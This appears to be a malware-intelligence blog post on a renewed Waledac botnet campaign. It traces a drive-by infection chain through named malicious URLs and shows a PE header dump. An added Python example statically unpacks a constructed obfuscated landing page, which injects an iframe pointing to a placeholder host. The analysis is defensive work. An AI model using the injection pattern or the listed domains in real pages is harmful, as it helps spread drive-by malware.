MalwareIntelligence is a site dedicated to research on everything related to anti-malware security, computer criminology and information security in general, always from a perspective closely tied to the field of intelligence.

1.1.10

After a long period of inactivity, the Waledac botnet is once again deploying the infection strategy that characterizes it: social engineering, this time using the start of the new year as its cover.

Waledac's most recent campaigns date from the middle of the year, when the propagation strategy was a fake video about Independence Day in the U.S., supposedly hosted on YouTube. In fact, the most significant activity of the year took place during the first quarter.

The following captures describe the timeline of Waledac's activity during 2009.

However, those behind Waledac never stopped: the domains recently put to use were registered throughout the period of supposed inactivity.

Each page used for propagation contains an obfuscated script whose instructions run automatically on the victim's machine. It exploits a weakness, then downloads and executes the malware without user interaction, turning the computer into a node of the botnet that carries on its activities. A screenshot of the script follows.

Inside the script is a reference to the file counter.php, which hosts another script; from there the chain jumps to http://diokxbgrqkgg.com/ld/trest1/ and then to http://diokxbgrqkgg.com/nte/trest1.py, where yet another malicious script is found.

Start of the downloaded binary, a Windows PE executable (the DOS stub is visible in the dump):

MZ......................@...............................................!..L.!This program cannot be run in DOS mode.$.........y.=u..=u..=u...u..u..
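The two things an analyst does with a landing page like the one described above are to statically unpack the obfuscated script to recover the redirection chain (the counter.php reference and the next-stage URLs) and to confirm that what the chain finally drops is a Windows executable, as the MZ dump shows. The Python below is an added example and is not code from this post or from the Waledac analysis; the post only shows the script as a screenshot, so the sample landing page and second stage are constructed to mimic the described pattern with two textbook layers (unescape() percent-encoding and String.fromCharCode()) and the placeholder host evil.invalid, and the PE bytes are a hand-built header rather than a real binary.

```python
"""Static unpacking of a drive-by landing page plus a PE header check on
the dropped payload.  Added example; the samples below are constructed,
not captured from the Waledac campaign, and evil.invalid is a placeholder."""
import re
import struct
from urllib.parse import unquote

# --- constructed samples ---------------------------------------------------
# Outer layer: percent-encoding (including a %uXXXX escape) fed to unescape();
# inner layer: String.fromCharCode() hiding an <iframe> that loads counter.php.
SAMPLE_HTML = (
    '<html><body><script>document.write(unescape("%3Cscript%3E%u0064ocument'
    '.write(String.fromCharCode(60,105,102,114,97,109,101,32,115,114,99,61,'
    '34,104,116,116,112,58,47,47,101,118,105,108,46,105,110,118,97,108,105,'
    '100,47,99,111,117,110,116,101,114,46,112,104,112,34,62))%3C/script%3E"))'
    '</script></body></html>'
)
# What a counter.php stage might serve: a redirect to the next directory.
SECOND_STAGE = 'window.location.href=unescape("http%3A%2F%2Fevil.invalid%2Fld%2Ftrest1%2F");'

FROMCHARCODE = re.compile(r"String\.fromCharCode\(([\d,\s]+)\)")
UNESCAPE = re.compile(r"unescape\((['\"])([^'\"]*)\1\)")


def _js_unescape(s: str) -> str:
    # JS unescape() understands %uXXXX as well as %XX; urllib's unquote only %XX.
    s = re.sub(r"%u([0-9A-Fa-f]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s)


def _js_literal(s: str) -> str:
    # Re-quote decoded text so the surrounding code stays parseable by the
    # extractors below (pick a quote character the text does not contain).
    q = "'" if "'" not in s else '"'
    return q + s + q


def deobfuscate(script: str, max_rounds: int = 8) -> str:
    """Peel unescape()/String.fromCharCode() layers purely textually (no eval),
    repeating until the text stops changing so nested layers are handled."""
    for _ in range(max_rounds):
        step = UNESCAPE.sub(lambda m: _js_literal(_js_unescape(m.group(2))), script)
        step = FROMCHARCODE.sub(
            lambda m: _js_literal("".join(chr(int(n)) for n in m.group(1).split(",") if n.strip())),
            step)
        if step == script:
            return step
        script = step
    return script


def extract_references(stage: str) -> list:
    """Decode one stage and list every location it points the browser at."""
    decoded = deobfuscate(stage)
    found = re.findall(r"src\s*=\s*['\"]([^'\"]+)['\"]", decoded)
    found += re.findall(r"location(?:\.href)?\s*=\s*['\"]([^'\"]+)['\"]", decoded)
    found += re.findall(r"https?://[^\s'\"<>]+", decoded)
    return list(dict.fromkeys(found))  # de-duplicate, keep order


def classify_payload(data: bytes) -> str:
    """Tell a Windows executable from a script/HTML stage by its header: a PE
    starts with the DOS stub 'MZ', and the little-endian dword at offset 0x3C
    (e_lfanew) points at the 'PE\\0\\0' signature."""
    if data[:2] == b"MZ" and len(data) >= 0x40:
        e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
        if data[e_lfanew:e_lfanew + 4] == b"PE\0\0":
            return "pe-executable"
        return "mz-stub-only"
    head = data.lstrip()[:256]
    if head.startswith(b"<") or b"document.write" in head or b"unescape(" in head:
        return "script-or-html"
    return "unknown"


def constructed_pe_header() -> bytes:
    """Minimal DOS header + PE signature, hand-built for the demo (not a real
    or runnable executable)."""
    hdr = bytearray(0x84)
    hdr[0:2] = b"MZ"
    msg = b"This program cannot be run in DOS mode."
    hdr[0x4E:0x4E + len(msg)] = msg          # conventional DOS stub message
    hdr[0x3C:0x40] = struct.pack("<I", 0x80)  # e_lfanew -> PE signature
    hdr[0x80:0x84] = b"PE\0\0"
    return bytes(hdr)


if __name__ == "__main__":
    print("landing page ->", extract_references(SAMPLE_HTML))
    print("counter.php  ->", extract_references(SECOND_STAGE))
    print("payload      ->", classify_payload(constructed_pe_header()))
```

The decoder deliberately never evaluates the script: the textual replacement loses nothing the extractors need and keeps the analysis safe to run on a captured page. Real landing pages usually stack further tricks (split strings, custom decoders, eval of concatenated pieces) that need a JavaScript sandbox; this handles only the two layers most often seen in 2009-era kits.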

Waledac is back with a new pretext, but judging by the activity level of the server hosting it, it appears to have stayed dormant with only very sporadic activity. Moreover, the folder structure from which the malware is downloaded suggests a direct relationship with another well-known threat, Bredolab, which is apparently also associated with some scareware and with ZeuS.